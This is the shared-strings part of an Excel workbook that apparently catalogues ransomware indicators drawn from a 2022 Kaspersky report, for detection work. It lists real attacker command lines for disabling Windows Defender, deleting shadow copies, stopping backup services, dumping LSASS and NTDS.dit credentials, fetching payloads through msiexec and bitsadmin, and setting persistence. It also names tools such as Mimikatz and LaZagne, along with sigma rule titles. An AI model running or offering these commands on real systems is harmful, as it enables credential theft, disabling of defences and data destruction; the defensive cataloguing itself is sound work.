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05B57A53-30EF-7044-92A7-BB3A6EDB5DA7}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="120" yWindow="-21100" windowWidth="38260" windowHeight="20960" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheet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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="903" uniqueCount="445">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>{ "data": "2022-06", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "tags": ["conti", "cl0p","hive", "alphv", "lockbit", "blackbyte"]}</t>
  </si>
  <si>
    <t>WMI is used to spread malware over the network. For
example, the Conti CobaltStrike beacon was spread via the wmic tool:</t>
  </si>
  <si>
    <t>WMIC to push malware</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>C:\Users\[user]\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\</t>
  </si>
  <si>
    <t>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes</t>
  </si>
  <si>
    <t xml:space="preserve">netsh advfirewall firewall set rule File and Printer Sharing new enable=Yes </t>
  </si>
  <si>
    <t>netsh firewall add allowedprogram “$user\$temp\cheats.exe” “cheats.exe” ENABLE</t>
  </si>
  <si>
    <t>netsh firewall add allowedprogram “$user\$temp\IXP000.TMP\crypted.exe” “crypted.exe” ENABLE</t>
  </si>
  <si>
    <t>taskill.exe /F /IM Raccine.exe</t>
  </si>
  <si>
    <t>taskill.exe /F /IM RaccineSettings.exe</t>
  </si>
  <si>
    <t xml:space="preserve">$windir\$system32\schtasks.exe /DELETE /TN “Raccine Rules Updater” /F </t>
  </si>
  <si>
    <t>Get-WmiObject Win32 _ Shadowcopy |ForEach-Object {$ _ .Delete();}</t>
  </si>
  <si>
    <t xml:space="preserve"> powershell New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force</t>
  </si>
  <si>
    <t>powershell Set-MpPreference -DisableRealTimeMonitoring $true</t>
  </si>
  <si>
    <t>powershell Uninstall-WindowsFeature -Name Windows-Defender</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f</t>
  </si>
  <si>
    <t>reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG _ DWORD /d “1” /f</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG _ DWORD /d “1” /f</t>
  </si>
  <si>
    <t>reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG _ DWORD /d “0” /f</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring”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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG _ DWORD /d “1” /f</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG _ DWORD /d “0” /f</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule Network Discovery new enable=Yes</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG _ DWORD /d “0” /f</t>
  </si>
  <si>
    <t>reg add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRoutinelyTakingAction” /t REG _DWORD /d “1” /f</t>
  </si>
  <si>
    <t>reg.exe add “HKLM\System\CurrentControlSet\Services\WdBoot” /v “Start” /t REG _DWORD /d “4”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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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powershell Set-MpPreference -DisableIOAVProtection $true</t>
  </si>
  <si>
    <t>powershell Set-MpPreference -DisableRealtimeMonitoring $true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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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file_path</t>
  </si>
  <si>
    <t>“$user\$appdata\[random]\cmd.exe”</t>
  </si>
  <si>
    <t>$windir\$system32\cmd.exe /k C:\Windows\inf\usbhub\explorer.exe -f C:\Windows\inf\usbhub\config.log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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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net session</t>
  </si>
  <si>
    <t>net use</t>
  </si>
  <si>
    <t>netstat -ano</t>
  </si>
  <si>
    <t>query session”</t>
  </si>
  <si>
    <t>net view</t>
  </si>
  <si>
    <t>net view /all</t>
  </si>
  <si>
    <t>net view /all /domain</t>
  </si>
  <si>
    <t>net share</t>
  </si>
  <si>
    <t>whoami /groups</t>
  </si>
  <si>
    <t>mstsc /v xxx</t>
  </si>
  <si>
    <t>mstsc /v xxx\c$</t>
  </si>
  <si>
    <t>“reg add “HKLM\System\CurrentControlSet\Control\Terminal Server” /v “fDenyTSConnections” /t REG_DWORD /d 0 /f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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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“powershell.exe -ExecutionPolicy Bypass -file \\[REMOTE _ HOSTNAME]\share$\p.ps1”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</si>
  <si>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</si>
  <si>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</si>
  <si>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“$windir\$system32\msiexec.exe” /q /I hxxp://27.102.70[.]196/km</t>
  </si>
  <si>
    <t>“vssadmin delete shadows /all /quiet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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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“vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB”,</t>
  </si>
  <si>
    <t>iisreset.exe /stop</t>
  </si>
  <si>
    <t>taskkill /f /im vee*</t>
  </si>
  <si>
    <t>taskkill /f /im postg*</t>
  </si>
  <si>
    <t xml:space="preserve">Exploit public facing app. Attackers target Microsoft Exchange Servers,
Sharepoint servers, VPN and other web services. The most commonly exploited vulnerabilities are ProxyShell CVEs: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 </t>
  </si>
  <si>
    <t>CVE-2021031207</t>
  </si>
  <si>
    <t>{"object": "process_create", "initiating_process_path": "$windir\$system32\inetsrv\w3wp.exe", "process_command_line": "$windir\$system32\WindowsPowerShell\
v1.0\powershell.exe -nop -exec bypass -EncodedCommand &lt;base64&gt;"}</t>
  </si>
  <si>
    <t>("object": "process_create", "process_commad_line": "cmd /c c:\\users\\public\\compareForFor.hta", "file_path": "$windir\\$system32\\cmd.exe", "initiating_process_path": "$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"</t>
  </si>
  <si>
    <t>("object": "process_create", "process_commad_line": "regsvr32 $user\$appdata\Vote1.ocx", "file_path": "$windir\$system32\regsvr32.exe", "initiating_process_path": "$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE"</t>
  </si>
  <si>
    <t>C:\Windows\System32\ShellExperiences\Windows Host.xml</t>
  </si>
  <si>
    <t>C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\WindowsHost.exe</t>
  </si>
  <si>
    <t>C:\Windows\System32\Tasks\Windows Host</t>
  </si>
  <si>
    <t>C:\Users\&lt;xxx&gt;\AppData\Local\Microsoft\Windows\Fonts\Courie-BoldItalic.ttf</t>
  </si>
  <si>
    <t>C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt</t>
  </si>
  <si>
    <t>C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\System Update.exe</t>
  </si>
  <si>
    <t>C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1</t>
  </si>
  <si>
    <t>“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol</t>
  </si>
  <si>
    <t xml:space="preserve"> $windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “Set-MpPreference -EnableControlledFolderAccess Disabled”</t>
  </si>
  <si>
    <t>$windir\$system32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \”RSAT-ADPowerShell\” –IncludeAllSubFeature</t>
  </si>
  <si>
    <t>$windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkOwB9AA==’));Invoke-Expression $x”</t>
  </si>
  <si>
    <t>{"object": "process_create",  "process_path": "$windir\$system32\wbem\WMIC.exe", "process_command_line": "wmic shadowcopy delete"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_path": "$windir\$system32\wbem\WMIC.exe", "process_command_line": "wmic csproduct get UUID"}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r''' wmic /node:&lt;IP _ address&gt; /user:”&lt;domain&gt;\&lt;user&gt;” /password:”&lt;password&gt;” process call create “cmd /c &lt;cobaltstrike _ path&gt;”'''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''start wmic /node:@C:\share$\comps##.txt /user:” &lt;xxx&gt;.com\&lt;xxx&gt;” /password:”*********” process call create “cmd.exe /c bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe&amp;%APPDATA%\xxx.exe”'''}</t>
  </si>
  <si>
    <t>{"object": "process_create", "file_path": " $windir\$system32\wbem\WMIC.exe", "process_command_line": r''' “$windir\$system32\Wbem\WMIC.exe” process where “name like ‘%manage%’” delete'''}</t>
  </si>
  <si>
    <t>schtasks /create /sc minute /mo 1 /tn Server /tr $user\$temp/Server.exe</t>
  </si>
  <si>
    <t>{"object": "process_create", "process_command_line": r'''“ “$windir\\$system32\\schtasks.exe /create /np /sc HOURLY /tn Task /tr \”$windir\\$system32\\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\\Users\\tree.dll\” /st 07:00”''', "initiating_process_path": “$windir\\regedit.exe”}</t>
  </si>
  <si>
    <t>Image _ path: $selfpath\$selfname.exe
Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run
Target _ file: $selfpath\\$selfname.exe</t>
  </si>
  <si>
    <t>nltest /dclist</t>
  </si>
  <si>
    <t>nltest /domain _ trusts</t>
  </si>
  <si>
    <t>dsquery subnet -limit 0</t>
  </si>
  <si>
    <t>bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe &amp; %APPDATA%\xxx.exe</t>
  </si>
  <si>
    <t>reg run keys addes</t>
  </si>
  <si>
    <t>net user xxx [password] /add /active:yes /expires:never</t>
  </si>
  <si>
    <t>net group “Enterprise admins” /domain</t>
  </si>
  <si>
    <t>net group “Domain admins” /domain</t>
  </si>
  <si>
    <t>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG _ DWORD /d 1 /f</t>
  </si>
  <si>
    <t>$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad</t>
  </si>
  <si>
    <t>$windir\\$system32\\rundll32.exe $windir\\$system32\\comsvcs.dll, MiniDump &lt;lsass _ pid&gt; $windir\\$temp\\xxx full</t>
  </si>
  <si>
    <t>procdump.exe -accepteula -ma lsass.exe mem.dmp</t>
  </si>
  <si>
    <t>$windir\$system32\cmd.exe /c ping 1.1.1.1 -n 10 &gt; Nul &amp; Del $selfpath\$selfname.exe /F /Q</t>
  </si>
  <si>
    <t>REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual Printer Driver” /t REG _ SZ /F /D $user\$appdata\Macromedia\Temporary\WinPrint.exe””</t>
  </si>
  <si>
    <t>Image _ path: $selfpath\$1sass.exe
Registry _ key: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Target _ file: $windir\$system32\$1sass.exe</t>
  </si>
  <si>
    <t>REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /V “Virtual Printer Driver" /t REG _ SZ /F /D ”$user\$appdata\Macromedia\Temporary\WinPrint.exe”</t>
  </si>
  <si>
    <t>registry run key add</t>
  </si>
  <si>
    <t>Image: $system32\attrib.exe
Command _ line: attrib +h +r +s “C:\Users\[user]\AppData\Local\Temp\Payload.exe”
Parent _ image _ path: $selfpath\$selfname.exe</t>
  </si>
  <si>
    <t xml:space="preserve">Image _ path: $selfpath\$selfname.exe
Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run
Target _ file: $user\$temp\Payload.exe </t>
  </si>
  <si>
    <t>Image _ path: $user\$temp\Payload.exe
Registry _ key: \REGISTRY\USER\$usersid\Software\Microsoft\Windows\CurrentVersion\Run
Target _ file: C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Templates\Windows.URL</t>
  </si>
  <si>
    <t xml:space="preserve">hide file </t>
  </si>
  <si>
    <t>net localgroup administrators xxx /add</t>
  </si>
  <si>
    <t>net stop “Acronis VSS Provider” /y</t>
  </si>
  <si>
    <t>net stop “Enterprise Client Service” /y</t>
  </si>
  <si>
    <t>net stop “SQLsafe Backup Service” /y</t>
  </si>
  <si>
    <t>net stop “SQLsafe Filter Service” /y”</t>
  </si>
  <si>
    <t>netsh firewall add allowedprogram “$user\$temp\svchos23.exe” “svchos23.exe” ENABLE</t>
  </si>
  <si>
    <t>net stop “Veeam Backup Catalog Data Service” /y</t>
  </si>
  <si>
    <t>net stop AcronisAgent /y</t>
  </si>
  <si>
    <t>Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll</t>
  </si>
  <si>
    <t>startup persistence</t>
  </si>
  <si>
    <t>{"object": "process_create", "file_path": "$windir\$system32\msiexec.exe", "process_command_line": "$windir\$system32\msiexec.exe /q /I hxxp://&lt;ip&gt;/&lt;resource&gt;"</t>
  </si>
  <si>
    <t>{"object": "process_create", "file_path": " $windir\$system32\mshta.exe", "process_command_line": "$windir\$system32\mshta.exe ‘C:\Users\Public\compareForFor.jpg’ {1E460BD7-F1C3-4B2E-88BF4E770A288AF5} {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}", "initating_process_path": "windir\$system32\cmd.exe"}</t>
  </si>
  <si>
    <t>$windir\$system32\DllHost.exe / Processid:{D2E7041B-2927–42fb-8E9F-7CE93B6DC937}</t>
  </si>
  <si>
    <t xml:space="preserve"> $windir\$system32\DllHost.exe / Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} </t>
  </si>
  <si>
    <t>{3E5FC7F9-9A51-4367-9063-A120244FBEC7} - CLSID of CMSTPLUA
COM Object</t>
  </si>
  <si>
    <t>{D2E7041B-2927–42fb-8E9F-7CE93B6DC937} - CLSID of
ColorDataProxy COM Object</t>
  </si>
  <si>
    <t>Invoke-TokenManipulation</t>
  </si>
  <si>
    <t>Get-System</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>sc.exe config SQLTELEMETRY start=disabled</t>
  </si>
  <si>
    <t>sc.exe config SQLTELEMETRY$ECWDB2 start=disabled</t>
  </si>
  <si>
    <t>sc.exe config SQLWriter start=disabled</t>
  </si>
  <si>
    <t>sc.exe config SstpSvc start= disabled</t>
  </si>
  <si>
    <t>sc.exe config MBAMService start=disabled</t>
  </si>
  <si>
    <t>sc.exe config wuauserv start= disabled</t>
  </si>
  <si>
    <t>Process Hollowing BlackByte</t>
  </si>
  <si>
    <t>{"object": "process_create", "file_path": " $windir\$system32\regsvr32.exe", "process_command_line": " $windir\$system32\regsvr32.exe C:\Users\Public\compareForFor.jpg", "initiating_process_name": " $windir\$system32\mshta.exe"}</t>
  </si>
  <si>
    <t xml:space="preserve"> cmd /c “”$user\$temp\update.bat” “</t>
  </si>
  <si>
    <t>REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce” /V “Virtual PrinterDriver” /t REG _ SZ /F /D “”$user\$appdata\Macromedia\Temporary\WinPrint.exe””</t>
  </si>
  <si>
    <t>$user\$appdata\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe</t>
  </si>
  <si>
    <t>The Cobalt
Strike sample accessed lsass.exe with the rights 0x1010 (read rights)
and dumped credentials of users logged on to the system.</t>
  </si>
  <si>
    <t>Image _ path: “$selfpath\$selfname”
Registry _ key: “\REGISTRY\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest”
Registry _ value _ name: “UserLogonCredential”
Registry _ value: “0x00000001”</t>
  </si>
  <si>
    <t>A secondary indicator of possible dumping the lsass.exe memory to
gain credentials is setting the Registry Key that forces the system
to store passwords in memory in plaintext,</t>
  </si>
  <si>
    <t>use ntdsutil to dump the NTDS.dit database</t>
  </si>
  <si>
    <t>“ntdsutil “ac in ntds” “ifm” “cr fu C:\Perflogs\1” q q “</t>
  </si>
  <si>
    <t>Image _ path: “$selfpath\$selfname.exe”,
File _ path: “$user\$appdata\Mozilla\Firefox\Profiles\054111xg.default\key3.db”,
File _ path: “$user\$appdata\Google\Chrome\User Data\
Default\Login Data”</t>
  </si>
  <si>
    <t>Browser Passwords</t>
  </si>
  <si>
    <t>Image _ path: “$selfpath\$selfname.exe”,
File _ path: “$appdata\Local\Google\Chrome\User Data\Local State”,
File _ path: “$appdata\Local\Google\Chrome\User Data\WebData-journal”,
File _ path: “$appdata\Local\Google\Chrome\User Data\WebData”,</t>
  </si>
  <si>
    <t>“powershell -command \”Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | FT Name\””</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>Bloodhound</t>
  </si>
  <si>
    <t xml:space="preserve">ransomware actors use the BloodHound utility to gather
information about the victim’s infrastructure. BloodHound provides
the attacker with a visualisation of relationships in Active Directory
and analysis of the AD rights. </t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>PowerShell Empire</t>
  </si>
  <si>
    <t xml:space="preserve"> LaZagne</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>procdump</t>
  </si>
  <si>
    <t>Ammy Admin</t>
  </si>
  <si>
    <t>Advanced IP Scanner</t>
  </si>
  <si>
    <t>RedLine Stealer</t>
  </si>
  <si>
    <t>NBMiner</t>
  </si>
  <si>
    <t>PCHunter</t>
  </si>
  <si>
    <t>GMER</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>SoftPerfect Network Scanner</t>
  </si>
  <si>
    <t>Process Explorer</t>
  </si>
  <si>
    <t>PowerView</t>
  </si>
  <si>
    <t>Windows Shell Start by Web Applications</t>
  </si>
  <si>
    <t>sigma</t>
  </si>
  <si>
    <t>Started windows shell from Trusted process</t>
  </si>
  <si>
    <t>Drop Execution File From by Trusted Process</t>
  </si>
  <si>
    <t>Windows Shell Started Schtasks</t>
  </si>
  <si>
    <t>Scheduled Task Start from Public Directory</t>
  </si>
  <si>
    <t>UAC Bypass via COM Object</t>
  </si>
  <si>
    <t>Disabling UAC via Registry</t>
  </si>
  <si>
    <t>Executing File Named as System Process in Unusual Directory</t>
  </si>
  <si>
    <t>Anomaly in the Windows Critical Process Tree</t>
  </si>
  <si>
    <t>Created Windows Shell from Critical Windows Process</t>
  </si>
  <si>
    <t>Suspicious LSASS Memory Access</t>
  </si>
  <si>
    <t>Detected Access to SAM,SYSTEM and SECURITY registry hives</t>
  </si>
  <si>
    <t>System Network Connections Discovery via Standard Windows Utilities</t>
  </si>
  <si>
    <t>System Network Connections Discovery via PowerShell</t>
  </si>
  <si>
    <t>Enabling RDP via Registry</t>
  </si>
  <si>
    <t>Enabling RDP in Windows Firewall</t>
  </si>
  <si>
    <t>Shadow Copies Deletion</t>
  </si>
  <si>
    <t>Disable Automatic Windows Recovery</t>
  </si>
  <si>
    <t>kasp-eid0001</t>
  </si>
  <si>
    <t>kasp-eid0002</t>
  </si>
  <si>
    <t>kasp-eid0003</t>
  </si>
  <si>
    <t>kasp-eid0004</t>
  </si>
  <si>
    <t>kasp-eid0005</t>
  </si>
  <si>
    <t>kasp-eid0006</t>
  </si>
  <si>
    <t>kasp-eid0007</t>
  </si>
  <si>
    <t>kasp-eid0008</t>
  </si>
  <si>
    <t>kasp-eid0009</t>
  </si>
  <si>
    <t>kasp-eid0010</t>
  </si>
  <si>
    <t>kasp-eid0011</t>
  </si>
  <si>
    <t>kasp-eid0012</t>
  </si>
  <si>
    <t>kasp-eid0013</t>
  </si>
  <si>
    <t>kasp-eid0014</t>
  </si>
  <si>
    <t>kasp-eid0015</t>
  </si>
  <si>
    <t>kasp-eid0016</t>
  </si>
  <si>
    <t>kasp-eid0017</t>
  </si>
  <si>
    <t>kasp-eid0018</t>
  </si>
  <si>
    <t>kasp-eid0019</t>
  </si>
  <si>
    <t>kasp-eid0020</t>
  </si>
  <si>
    <t>kasp-eid0021</t>
  </si>
  <si>
    <t>kasp-eid0022</t>
  </si>
  <si>
    <t>kasp-eid0023</t>
  </si>
  <si>
    <t>kasp-eid0024</t>
  </si>
  <si>
    <t>kasp-eid0025</t>
  </si>
  <si>
    <t>kasp-eid0026</t>
  </si>
  <si>
    <t>kasp-eid0027</t>
  </si>
  <si>
    <t>kasp-eid0028</t>
  </si>
  <si>
    <t>kasp-eid0029</t>
  </si>
  <si>
    <t>kasp-eid0030</t>
  </si>
  <si>
    <t>kasp-eid0031</t>
  </si>
  <si>
    <t>kasp-eid0032</t>
  </si>
  <si>
    <t>kasp-eid0033</t>
  </si>
  <si>
    <t>kasp-eid0034</t>
  </si>
  <si>
    <t>kasp-eid0035</t>
  </si>
  <si>
    <t>kasp-eid0036</t>
  </si>
  <si>
    <t>kasp-eid0037</t>
  </si>
  <si>
    <t>kasp-eid0038</t>
  </si>
  <si>
    <t>kasp-eid0039</t>
  </si>
  <si>
    <t>kasp-eid0040</t>
  </si>
  <si>
    <t>kasp-eid0041</t>
  </si>
  <si>
    <t>kasp-eid0042</t>
  </si>
  <si>
    <t>kasp-eid0043</t>
  </si>
  <si>
    <t>kasp-eid0044</t>
  </si>
  <si>
    <t>kasp-eid0045</t>
  </si>
  <si>
    <t>kasp-eid0046</t>
  </si>
  <si>
    <t>kasp-eid0047</t>
  </si>
  <si>
    <t>kasp-eid0048</t>
  </si>
  <si>
    <t>kasp-eid0049</t>
  </si>
  <si>
    <t>kasp-eid0050</t>
  </si>
  <si>
    <t>kasp-eid0051</t>
  </si>
  <si>
    <t>kasp-eid0052</t>
  </si>
  <si>
    <t>kasp-eid0053</t>
  </si>
  <si>
    <t>kasp-eid0054</t>
  </si>
  <si>
    <t>kasp-eid0055</t>
  </si>
  <si>
    <t>kasp-eid0056</t>
  </si>
  <si>
    <t>kasp-eid0057</t>
  </si>
  <si>
    <t>kasp-eid0058</t>
  </si>
  <si>
    <t>kasp-eid0059</t>
  </si>
  <si>
    <t>kasp-eid0060</t>
  </si>
  <si>
    <t>kasp-eid0061</t>
  </si>
  <si>
    <t>kasp-eid0062</t>
  </si>
  <si>
    <t>kasp-eid0063</t>
  </si>
  <si>
    <t>kasp-eid0064</t>
  </si>
  <si>
    <t>kasp-eid0065</t>
  </si>
  <si>
    <t>kasp-eid0066</t>
  </si>
  <si>
    <t>kasp-eid0067</t>
  </si>
  <si>
    <t>kasp-eid0068</t>
  </si>
  <si>
    <t>kasp-eid0069</t>
  </si>
  <si>
    <t>kasp-eid0070</t>
  </si>
  <si>
    <t>kasp-eid0071</t>
  </si>
  <si>
    <t>kasp-eid0072</t>
  </si>
  <si>
    <t>kasp-eid0073</t>
  </si>
  <si>
    <t>kasp-eid0074</t>
  </si>
  <si>
    <t>kasp-eid0075</t>
  </si>
  <si>
    <t>kasp-eid0076</t>
  </si>
  <si>
    <t>kasp-eid0077</t>
  </si>
  <si>
    <t>kasp-eid0078</t>
  </si>
  <si>
    <t>kasp-eid0079</t>
  </si>
  <si>
    <t>kasp-eid0080</t>
  </si>
  <si>
    <t>kasp-eid0081</t>
  </si>
  <si>
    <t>kasp-eid0082</t>
  </si>
  <si>
    <t>kasp-eid0083</t>
  </si>
  <si>
    <t>kasp-eid0084</t>
  </si>
  <si>
    <t>kasp-eid0085</t>
  </si>
  <si>
    <t>kasp-eid0086</t>
  </si>
  <si>
    <t>kasp-eid0087</t>
  </si>
  <si>
    <t>kasp-eid0088</t>
  </si>
  <si>
    <t>kasp-eid0089</t>
  </si>
  <si>
    <t>kasp-eid0090</t>
  </si>
  <si>
    <t>kasp-eid0091</t>
  </si>
  <si>
    <t>kasp-eid0092</t>
  </si>
  <si>
    <t>kasp-eid0093</t>
  </si>
  <si>
    <t>kasp-eid0094</t>
  </si>
  <si>
    <t>kasp-eid0095</t>
  </si>
  <si>
    <t>kasp-eid0096</t>
  </si>
  <si>
    <t>kasp-eid0097</t>
  </si>
  <si>
    <t>kasp-eid0098</t>
  </si>
  <si>
    <t>kasp-eid0099</t>
  </si>
  <si>
    <t>kasp-eid0100</t>
  </si>
  <si>
    <t>kasp-eid0101</t>
  </si>
  <si>
    <t>kasp-eid0102</t>
  </si>
  <si>
    <t>kasp-eid0103</t>
  </si>
  <si>
    <t>kasp-eid0104</t>
  </si>
  <si>
    <t>kasp-eid0105</t>
  </si>
  <si>
    <t>kasp-eid0106</t>
  </si>
  <si>
    <t>kasp-eid0107</t>
  </si>
  <si>
    <t>kasp-eid0108</t>
  </si>
  <si>
    <t>kasp-eid0109</t>
  </si>
  <si>
    <t>kasp-eid0110</t>
  </si>
  <si>
    <t>kasp-eid0111</t>
  </si>
  <si>
    <t>kasp-eid0112</t>
  </si>
  <si>
    <t>kasp-eid0113</t>
  </si>
  <si>
    <t>kasp-eid0114</t>
  </si>
  <si>
    <t>kasp-eid0115</t>
  </si>
  <si>
    <t>kasp-eid0116</t>
  </si>
  <si>
    <t>kasp-eid0117</t>
  </si>
  <si>
    <t>kasp-eid0118</t>
  </si>
  <si>
    <t>kasp-eid0119</t>
  </si>
  <si>
    <t>kasp-eid0120</t>
  </si>
  <si>
    <t>kasp-eid0121</t>
  </si>
  <si>
    <t>kasp-eid0122</t>
  </si>
  <si>
    <t>kasp-eid0123</t>
  </si>
  <si>
    <t>kasp-eid0124</t>
  </si>
  <si>
    <t>kasp-eid0125</t>
  </si>
  <si>
    <t>kasp-eid0126</t>
  </si>
  <si>
    <t>kasp-eid0127</t>
  </si>
  <si>
    <t>kasp-eid0128</t>
  </si>
  <si>
    <t>kasp-eid0129</t>
  </si>
  <si>
    <t>kasp-eid0130</t>
  </si>
  <si>
    <t>kasp-eid0131</t>
  </si>
  <si>
    <t>kasp-eid0132</t>
  </si>
  <si>
    <t>kasp-eid0133</t>
  </si>
  <si>
    <t>kasp-eid0134</t>
  </si>
  <si>
    <t>kasp-eid0135</t>
  </si>
  <si>
    <t>kasp-eid0136</t>
  </si>
  <si>
    <t>kasp-eid0137</t>
  </si>
  <si>
    <t>kasp-eid0138</t>
  </si>
  <si>
    <t>kasp-eid0139</t>
  </si>
  <si>
    <t>kasp-eid0140</t>
  </si>
  <si>
    <t>kasp-eid0141</t>
  </si>
  <si>
    <t>kasp-eid0142</t>
  </si>
  <si>
    <t>kasp-eid0143</t>
  </si>
  <si>
    <t>kasp-eid0144</t>
  </si>
  <si>
    <t>kasp-eid0145</t>
  </si>
  <si>
    <t>kasp-eid0146</t>
  </si>
  <si>
    <t>kasp-eid0147</t>
  </si>
  <si>
    <t>kasp-eid0148</t>
  </si>
  <si>
    <t>kasp-eid0149</t>
  </si>
  <si>
    <t>kasp-eid0150</t>
  </si>
  <si>
    <t>kasp-eid0151</t>
  </si>
  <si>
    <t>kasp-eid0152</t>
  </si>
  <si>
    <t>kasp-eid0153</t>
  </si>
  <si>
    <t>kasp-eid0154</t>
  </si>
  <si>
    <t>kasp-eid0155</t>
  </si>
  <si>
    <t>kasp-eid0156</t>
  </si>
  <si>
